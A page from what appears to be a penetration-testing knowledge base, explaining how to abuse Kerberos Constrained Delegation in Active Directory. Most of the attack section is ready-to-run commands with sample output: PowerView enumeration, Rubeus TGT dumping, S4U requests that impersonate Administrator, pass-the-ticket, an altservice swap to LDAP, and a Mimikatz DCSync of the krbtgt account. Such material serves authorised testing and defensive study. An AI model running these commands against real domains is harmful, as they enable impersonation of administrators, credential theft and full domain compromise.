Pentest Everything
GitHubPsMapExec
  • ⚔️Pentest Everything
  • 🚩Writeups
    • CyberSecLabs
      • Active Directory
        • Dictionary
        • Spray (WIP)
      • Linux
        • Shock
        • Pie
      • Windows
        • Brute
        • Deployable
        • Glass
        • Monitor
        • Sam
        • Secret
        • Stack
        • Unattended
        • Weak
    • HackTheBox
      • Active Directory
        • Active
        • Blackfield
        • Cascade
        • Forest
        • Intelligence
        • Mantis
        • Monteverde
        • Resolute
        • Return
        • Sauna
        • Search
      • Linux
        • Antique
        • Armageddon
        • Backdoor
        • Bashed
        • Cap
        • Cronos
        • Curling
        • Knife
        • Lame
        • Help
        • Horizontall
        • OpenAdmin
        • Poison
        • SolidState
        • Traceback
        • Trick
      • Windows
        • Access
        • Artic
        • Bastard
        • Bastion
        • Bounty
        • Devel
        • Heist
        • Jeeves
        • Jerry
        • Legacy
        • Love
        • Optimum
        • Remote
        • SecNotes
        • Servmon
        • Timelapse
        • Querier
    • PG Play | Vulnhub
      • Linux
        • BBSCute
        • BTRSys2.1
        • Born2root
        • BossPlayersCTF
        • Covfefe
        • Dawn
        • DC5
        • Funbox
        • FunboxEasy
        • FunBoxEasyEnum
        • HackerFest2019
        • Geisha
        • JISCTF
        • My-CMSMS
        • NoName
        • OnSystemShellDredd
        • Photographer
        • Potato
        • PyExp
        • Samurai
        • SunsetDecoy
        • SunsetMidnight
        • SunsetTwilight
        • Wpwn
    • PG Practice
      • Linux
        • ClamAV
        • Nibbles
        • Payday
        • Pelican
        • Peppo
        • Postfish
        • Pwned1
        • Snookums
        • Sirol
        • Sorcerer
        • Quackerjack
        • WebCal
        • Walla
        • ZenPhoto
        • Zino
      • Windows
        • Algernon
        • Compromised
        • Kevin
        • Helpdesk
        • Hutch
        • Jacko
        • Meathead
        • Metallus
        • Shenzi
        • Slort
        • UT99
    • TryHackMe
      • Linux
        • All in One
        • Archangel
        • Anonforce
        • Biblioteca
        • Cat Pictures
        • Chill Hack
        • CMesS
        • ColddBox
        • ConvertMyVideo
        • CyberHeroes
        • Cyborg
        • Dav
        • Fusion Corp
        • GamingServer
        • Gallery
        • Internal
        • Jacobtheboss
        • Kiba
        • LazyAdmin
        • Library
        • Madness
        • Marketplace
        • Mustacchio
        • NerdHerd
        • Oh My WebServer
        • Olympus
        • Plotted-TMS
        • Skynet
        • Startup
        • Surfer
        • Team
        • Tech_Supp0rt: 1
        • Tomghost
        • VulnNet
        • Undiscovered
        • Year of the Owl
      • Windows
        • Blueprint
        • Enterprise
        • Flatline
        • Quotient
        • RazorBlack
        • Relevant
        • USTOUN
        • VulnNet: Roasted
    • To Do
      • AllSignsPoint2Pwnage (WIP)
      • Hunit (WIP)
      • Escape (WIP)
      • Banzai (WIP)
      • Billyboss (WIP)
      • Fish
      • Ra
      • Roquefort (WIP)
  • 💾GitHub
  • 🔵 PsMapExec
  • Everything
    • Buffer Overflow Guide
    • Everything Active Directory and Windows
      • Active Directory Enumeration
      • ADCS
        • Enumeration - Certificate Authority
        • ESC1
        • ESC2
        • ESC3
        • ESC4
        • ESC6
        • ESC7
        • ESC8
        • ESC9 - WIP
        • ESC11
      • Access Token Manipultion
        • Token Impersonation
        • Create Process with Token
        • 🔨Make and Impersonate Token
        • Parent PID Spoofing
        • 🔨SID-History Injection
      • Adversary-in-the-Middle
        • 🔨LDAP Relay
        • 🔨LLMNR
        • 🔨RDP MiTM
        • 🔨SMB Relay
      • Credential Access
        • Brute Force
          • Password Spraying
        • Credential Dumping
          • LSASS Memory
          • Security Account Manager (SAM)
          • NTDS
          • LSA Secrets
          • Cached Domain Credentials
          • DCSync
            • 🔨DCSync Attack
        • Credentials from Password Stores
          • Credentials from Web Browsers
          • Windows Credential Manager
        • Unsecured Credentials
          • Credentials In Files
          • Credentials in Registry
          • Group Policy Preferences
            • 🔨GPP Passwords
        • 🔨Modify Authentication Process
          • Domain Controller Authentication: Skeleton Key
          • Reversible Encryption
        • Steal or Forge Kerberos Tickets
          • AS-REP Roasting
          • Golden Ticket
          • Kerberoasting
          • Silver Ticket
          • S4U2Self
          • Ticket Aquisition
          • Constrained Delegation
          • Unconstrained Delegation
      • Collection
        • Clipboard Data
        • Audio Capture
      • Defense Evasion
        • Disable and Bypass Defender
        • Impair Defenses
          • Disable Windows Event Logging
          • Impair Command History Logging
          • Disable or Modify System Firewall
        • Indicator Removal
          • Clear Windows Event Logs
          • Clear Command History
          • File Deletion
          • Network Share Connection Removal
          • Timestomp
      • Input Capture
        • Keylogging
      • Lateral Movement
        • PowerShell Remoting
        • Alternate Authentication Material
          • Pass The Hash
          • Pass the Ticket
          • Pass the Password
      • File Execution Methods
      • File Transfer Techniques
      • Forced Coercion
        • URL File Attack
      • LAPS
      • Network Sniffing
      • Persistence
        • AdminSDHolder
        • BITS Jobs
        • Create Account
          • Local Account
          • Domain Account
          • Cloud Account
        • Create or Modify System Process
          • Windows Service
        • Custom SSP
        • DSRM
        • 🔨Persistence Notes
        • Skeleton Key Attack
      • Privilege Escalation
        • Privilege Escalation Checklist
        • DnsAdmin
        • Registry
          • Always Install Elevated
          • AutoRuns
        • Service Exploits
          • Insecure Service Permissions
      • SCCM / MECM
        • Recon
        • CRED-1 - PXE Abuse
        • CRED-2 - Policy Request Credentials
        • CRED-3 - WMI Local Secrets
        • CRED-4 - CIM Repository
        • CRED-5 - MSSQL Database
        • ELEVATE-2 - Client Push
        • TAKEOVER-2
      • Timeroasting
      • Tools
        • BloodHound
    • Everything Linux
      • File Transfer Techniques
      • Linux Privilege Escalation Techniques
      • Privilege Escalation Checklist
      • Shell Upgrades
    • Everything OSINT
      • Discovering Email Addresses
      • Dork Tools
      • Image OSINT
      • Metadata OSINT
      • Password OSINT
      • Phone Number OSINT
      • Search Engine Operators
      • Social Media OSINT Tools
      • OSINT CTFs
      • OSINT VM
      • Username OSINT
    • Everything Web
      • Command Injection
      • Enumeration
      • File Upload
      • Sub Domain Enumeration
      • XSS
    • Host Discovery
    • Pivoting and Portforwarding
    • Ports
      • Nmap Commands for port discovery
      • Port 21 | FTP
      • Port 25 | SMTP
      • Port 53 | DNS
      • Port 88 | Kerberos
      • Ports 111 | 32771 | rpcbind
      • Port 123 | NTP
      • Ports 137 | 138 | 139 | NetBIOS
      • Ports 139 | 445 | SMB
      • Ports 161 | 162 | SNMP
      • Port 389 | LDAP
      • Ports 1099 | Java RMI
      • Ports 2049 | NFS
      • Port 3389 | RDP
      • Ports 8080 | 8180 | Apache Tomcat
    • PowerShell
      • Constrained Language Mode
      • Download and Execution Methods
      • Resources
      • Restricted Mode
  • Resources
    • Cheat Sheets
      • Default Passwords
      • Kerberoast
      • Mimikatz
      • Powerup
    • Hashcat Word lists and Rules
    • Metasploit Modules
    • Misc Snippets
    • GTFOBins
    • LOLBAS
    • WADCOMS
    • Reverse Shell Generator
    • OSINT Tools
    • Weakpass
  • Password Filter DLL
  • Dork Cheatsheet
Powered by GitBook
On this page
  • Requirements
  • Explanation
  • Enumeration
  • Obtain TGT
  • Obtains TGS for service
  • Pass the Ticket (PtT)
  • Alternate Service Name
  • Generate service tickets for all service types
  1. Everything
  2. Everything Active Directory and Windows
  3. Credential Access
  4. Steal or Forge Kerberos Tickets

Constrained Delegation

Last updated 8 months ago

Requirements

Compromise of the Active Directory Object that is configured for "Trusted to Auth".

Explanation

Recommended to read first:

Microsoft introduced Constrained Delegation in Windows Server 2003 to provide a more secure form of delegation compared to the high-risk Unconstrained Delegation.

With Constrained Delegation, administrators can specify the services or applications for which a server is allowed to act on behalf of a user, thereby limiting the attack surface. This feature can reduce the risk of an attacker impersonating a user and accessing resources that they are not authorized to access.

Enumeration

PowerView

# Get computer Constrained Delegation
Get-DomainComputer -TrustedToAuth| Select DnsHostName,UserAccountControl,msds-allowedtodelegateto | FL

# Get user Constrained Delegation
Get-DomainUser -TrustedToAuth

PowerShell

# Search both users and computers for Constrained Delegation
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

Obtain TGT

# Triage current tickets
Rubeus.exe triage

# Dump the systems TGT
Rubeus.exe dump /luid:[LUID] /service:[krbtgt] /user:[Hostname] /nowrap

# OR
# If you have the NTLM hash for the compromised account
Rubeus.exe asktgt /user:[User] /ntlm:[NTLM Hash] OR /aes265[aes265 Hash]

# If you have the aes265 hash for the compromised account
Rubeus.exe asktgt /user:[User] /aes265[aes265 Hash]

# If you have the plain text password
rubeus.exe asktgt /user:[User] /password:[Password]

Triage current tickets

Rubeus.exe Triage

Method: Dump system TGT

Rubeus.exe dump /luid:0x3e4 /service:krbtgt /user:srv01 /nowrap
# Triage current tickets
Invoke-Rubeus -Command "triage"

# Dump the systems TGT
Invoke-Rubeus -Command "dump /luid:[LUID] /service:[krbtgt] /user:[Hostname] /nowrap"

# OR
# If you have the NTLM hash for the compromised account
Invoke-Rubeus -Command "asktgt /user:[User] /ntlm:[NTLM Hash] OR /aes265[aes265 Hash]"

# If you have the aes265 hash for the compromised account
Invoke-Rubeus -Command "asktgt /user:[User] /aes265[aes265 Hash]"

# If you have the plain text password
Invoke-Rubeus -Command "asktgt /user:[User] /password:[Password]"

Obtains TGS for service

# Use obtained TGT to request a TGS ticket for the delegated service and impersonate another user
Rubeus.exe s4u /impersonateuser:[User] /msdsspn:[SPN/FQDN] /user:[User] /ticket:[Base64 ticket] /nowrap

Example

Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/dc01.security.local /user:srv01$ /ticket:[Base64 ticket] /nowrap

Output

[*] Action: S4U

[*] Building S4U2self request for: 'SRV01$@SECURITY.LOCAL'
[*] Using domain controller: DC01.Security.local (10.10.10.100)
[*] Sending S4U2self request to 10.10.10.100:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'SRV01$@SECURITY.LOCAL'
[*] base64(ticket.kirbi):

[Base64 Ticket Output]

[*] Impersonating user 'Administrator' to target SPN 'cifs/dc01.security.local'
[*] Building S4U2proxy request for service: 'cifs/dc01.security.local'
[*] Using domain controller: DC01.Security.local (10.10.10.100)
[*] Sending S4U2proxy request to domain controller 10.10.10.100:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc01.security.local':

[Base64 Ticket Output]
# Use obtained TGT to request a TGS ticket for the delegated service and impersonate another user
Invoke-Rubeus -Command "s4u /impersonateuser:[User] /msdsspn:[SPN/FQDN] /user:[User] /ticket:[Base64 ticket] /nowrap"

Example

Invoke-Rubeus -Command "s4u /impersonateuser:Administrator /msdsspn:cifs/dc01.security.local /user:srv01$ /ticket:[Base64 ticket] /nowrap"

Pass the Ticket (PtT)

# Method 1: Pass ticket into seperate session (Preffered)
# Create new LUID session (Requires Elevation)
Rubeus.exe createnetonly /program:c:\windows\system32\cmd.exe /show

# Pass ticket into new session
Rubeus.exe ptt /luid:[LUID from previous command] /ticket:[Base64 ticket]

# Method 2: Pass ticket directly into current session (Can cause auth issues)
Rubeus.exe ptt /ticket:[Base64 ticket]
# Method 1: Pass ticket into seperate session (Preffered)
# Create new LUID session (Requires Elevation)
Invoke-Rubeus -Command "createnetonly /program:c:\windows\system32\cmd.exe /show"

# Pass ticket into new session
Invoke-Rubeus -Command "ptt /luid:[LUID from previous command] /ticket:[Base64 ticket]"

# Method 2: Pass ticket directly into current session (Can cause auth issues)
Invoke-Rubeus -Command "ptt /ticket:[Base64 ticket]"

With effective Domain Administrator rights on the primary Domain Controllers for the CIFS service we can perform actions based on CIFS such as Psexec and remotely listing the C$ drive.

Alternate Service Name

Kerberos uses a Service Principal Name (SPN) to identify a service during authentication, which is typically a combination of the service name and the host's name where the service is running. Rubeus.exe includes an option called /altservicename that enables an attacker to use a different service name when constructing the SPN. This option can be helpful in certain situations, such as when the default service name is unavailable or the attacker wants to target a specific service.

In this instance, we're leveraging the TGT issued for SRV01$ to obtain a TGS for LDAP.

Following on from the section: Obtain TGT use the following commands to generate a TGS for the alternative service name.

Rubeus.exe s4u /impersonateuser:[User] /msdsspn:[SPN/FQDN] /altservice:[Alternate-Service] /user:[User] /ticket:[Base64 ticket] /nowrap

Example

Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/dc01.security.local /altservice:ldap /user:srv01$ /ticket:[Base64 ticket] /nowrap

Output

From the output below we see that firstly,

[*] Action: S4U

[*] Building S4U2self request for: 'SRV01$@SECURITY.LOCAL'
[*] Using domain controller: DC01.Security.local (10.10.10.100)
[*] Sending S4U2self request to 10.10.10.100:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'SRV01$@SECURITY.LOCAL'
[*] base64(ticket.kirbi):

[Base64 Ticket Output]

[*] Impersonating user 'administrator' to target SPN 'cifs/dc01.security.local'
[*]   Final ticket will be for the alternate service 'ldap'
[*] Building S4U2proxy request for service: 'cifs/dc01.security.local'
[*] Using domain controller: DC01.Security.local (10.10.10.100)
[*] Sending S4U2proxy request to domain controller 10.10.10.100:88
[+] S4U2proxy success!
[*] Substituting alternative service name 'ldap'
[*] base64(ticket.kirbi) for SPN 'ldap/dc01.security.local':

[Base64 Ticket Output]

In the above output we alternate the CIFS service for LDAP. As the Domain Administrator has been impersonated this can be used to perfrom DCSync.

Invoke-Mimikatz -Command '"lsadump::dcsync /domain:security.local /user:krbtgt"'
Invoke-Rubeus -Command "s4u /impersonateuser:[User] /msdsspn:[SPN/FQDN] /altservice:[Alternate-Service] /user:[User] /ticket:[Base64 ticket] /nowrap"

Example

Invoke-Rubeus -Command "s4u /impersonateuser:Administrator /msdsspn:cifs/dc01.security.local /altservice:ldap /user:srv01$ 
/ticket:[Base64 ticket] /nowrap"

Generate service tickets for all service types

Invoke-Rubeus -Command "s4u /impersonateuser:Administrator /self /altservice:http/dc01.security.local /user:srv01$ /ticket:$ticket /nowrap /ptt"

Invoke-Rubeus -Command "s4u /impersonateuser:Administrator /self /altservice:cifs/dc01.security.local /user:srv01$ /ticket:$ticket /nowrap /ptt"

Invoke-Rubeus -Command "s4u /impersonateuser:Administrator /self /altservice:host/dc01.security.local /user:srv01$ /ticket:$ticket /nowrap /ptt"

Invoke-Rubeus -Command "s4u /impersonateuser:Administrator /self /altservice:ldap/dc01.security.local /user:srv01$ /ticket:$ticket /nowrap /ptt"

Invoke-Rubeus -Command "s4u /impersonateuser:Administrator /self /altservice:wsman/dc01.security.local /user:srv01$ /ticket:$ticket /nowrap /ptt"

Invoke-Rubeus -Command "s4u /impersonateuser:Administrator /self /altservice:mssql/dc01.security.local /user:srv01$ /ticket:$ticket /nowrap /ptt"

Invoke-Rubeus -Command "s4u /impersonateuser:Administrator /self /altservice:rpcss/dc01.security.local /user:srv01$ /ticket:$ticket /nowrap /ptt"

Unconstrained Delegation